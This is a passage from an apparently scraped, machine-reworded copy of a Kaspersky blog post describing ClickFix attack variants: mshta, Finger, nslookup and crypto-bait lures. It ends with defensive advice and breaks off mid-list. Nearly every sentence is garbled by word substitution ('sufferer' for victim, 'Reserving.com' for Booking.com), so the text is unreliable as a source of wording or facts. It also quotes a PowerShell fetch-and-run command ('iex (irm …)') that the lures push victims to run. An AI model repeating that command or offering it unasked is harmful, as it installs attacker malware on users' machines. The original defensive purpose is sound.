Variations of the ClickFix | Kaspersky official weblog – Cyber Tech
A couple of yr in the past, we printed a publish in regards to the ClickFix approach, which was gaining reputation amongst attackers. The essence of assaults utilizing ClickFix boils all the way down to convincing the sufferer, below varied pretexts, to run a malicious command on their pc. That’s, from the cybersecurity options viewpoint, it’s run on behalf of the energetic consumer and with their privileges.
In early makes use of of this method, cybercriminals tried to persuade victims that they should execute a command to repair some drawback or to go a captcha, and within the overwhelming majority of circumstances, the malicious command was a PowerShell script. Nonetheless, since then, attackers have provide you with a variety of new tips that customers needs to be warned about, in addition to a variety of new variants of malicious payload supply, that are additionally price maintaining a tally of.
Use of mshta.exe
Final yr, Microsoft specialists printed a report on cyberattacks concentrating on lodge house owners working with Reserving.com. The attackers despatched out pretend notifications from the service, or emails pretending to be from company drawing consideration to a assessment. In each circumstances, the e-mail contained a hyperlink to a web site imitating Reserving.com, which requested the sufferer to show that they weren’t a robotic by working a code by way of the Run menu.
There are two key variations between this assault and ClickFix. First, the consumer isn’t requested to repeat the string (in spite of everything, a string with code typically arouses suspicion). It’s copied to the change buffer by the malicious web site – most likely when the consumer clicks on a checkbox that mimics the reCAPTCHA mechanism. Second, the malicious string calls the official mshta.exe utility, which serves to run functions written in HTML. It contacts the attackers’ server and executes the malicious payload.
Video on TikTok and PowerShell with administrator privileges
BleepingComputer printed an article in October 2025 a couple of marketing campaign spreading malware by means of directions in TikTok movies. The movies themselves imitate video tutorials on activate proprietary software program free of charge. The recommendation they provide boils all the way down to a have to run PowerShell with administrator rights after which execute the command iex (irm {tackle}). Right here, the irm command downloads a malicious script from a server managed by attackers, and the iex (Invoke-Expression) command runs it. The script, in flip, downloads an infostealer malware to the sufferer’s pc.
Utilizing the Finger protocol
One other uncommon variant of the ClickFix assault makes use of the acquainted captcha trick, however the malicious script makes use of the outdated Finger protocol. The utility of the identical identify permits anybody to request information a couple of particular consumer on a distant server. The protocol isn’t used these days, however it’s nonetheless supported by Home windows, macOS, and a variety of Linux-based programs.
The consumer is persuaded to open the command line interface and use it to run a command that establishes a connection by way of the Finger protocol (utilizing TCP port 79) with the attackers’ server. The protocol solely transfers textual content data, however this is sufficient to obtain one other script to the sufferer’s pc, which then installs the malware.
CrashFix variant
One other variant of ClickFix differs in that it makes use of extra subtle social engineering. It was utilized in an assault on customers looking for a instrument to dam promoting banners, trackers, malware, and different undesirable content material on net pages. When trying to find an appropriate extension for Google Chrome, victims discovered one thing known as NexShield – Superior Net Guardian, which was in actual fact a clone of actual working software program, however which sooner or later crashed the browser and displayed a pretend notification a couple of detected safety drawback and the necessity to run a “scan” to repair the error. If the consumer agreed, they obtained directions on open the Run menu and execute a command that the extension had beforehand copied to the clipboard.
The command copied the acquainted finger.exe file to a short lived listing, renamed it ct.exe, after which launched it with the attacker’s tackle. The remainder of the assault was the identical as within the abovementioned case. In response to the Finger protocol request, a malicious script was delivered, which launched and put in a distant entry Trojan (on this case, ModeloRAT).
Malware supply by way of DNS lookup
The Microsoft Menace Intelligence group additionally shared a barely extra advanced than common ClickFix assault variant. Sadly, they didn’t describe the social engineering trick, however the technique of delivering the malicious payload is sort of attention-grabbing. Most likely as a way to complicate detection of the assault in a company atmosphere and extend the lifetime of the malicious infrastructure, the attackers used an extra step: contacting a DNS server managed by the attackers.
That’s, after the sufferer is someway persuaded to repeat and execute a malicious command, a request is distributed to the DNS server on behalf of the consumer by way of the official nslookup utility, requesting information for the instance.com area. The command contained the tackle of a particular DNS server managed by the attackers. It returns a response that, amongst different issues, returned a string with malicious script, which in flip downloads the ultimate payload (on this assault, ModeloRAT once more).
Cryptocurrency bait and JavaScript as payload
The following assault variant is attention-grabbing for its multi-stage social engineering. In feedback on Pastebin, attackers actively unfold a message about an alleged flaw within the Swapzone.io cryptocurrency change service. Cryptocurrency house owners had been invited to go to a useful resource created by fraudsters, which contained full directions on exploit this flaw, which may make as much as $13,000 in a few days.
The directions clarify how the service’s flaws may be exploited to change cryptocurrency at a extra favorable fee. To do that, a sufferer must open the service’s web site within the Chrome browser, manually sort “javascript:” within the tackle bar, after which paste the JavaScript script copied from the attackers’ web site and execute it. In actuality, after all, the script can not have an effect on change charges in any means; it merely replaces Bitcoin pockets addresses and, if the sufferer truly tries to change one thing, transfers the funds to the attackers’ accounts.
defend your organization from ClickFix assaults
The best assaults utilizing the ClickFix approach may be countered by blocking the [Win] + [R] key mixture on work units. However, as we see from the examples listed, that is removed from the one sort of assault wherein customers are requested to run malicious code themselves.
Subsequently, the primary recommendation is to lift worker cybersecurity consciousness. They have to clearly perceive that if somebody asks them to carry out any uncommon manipulations with the system, and/or copy and paste code someplace, then typically it is a trick utilized by cybercriminals. Safety consciousness coaching may be organized utilizing the Kaspersky Automated Safety Consciousness Platform.
As well as, to guard in opposition to such cyberattacks, we advocate:
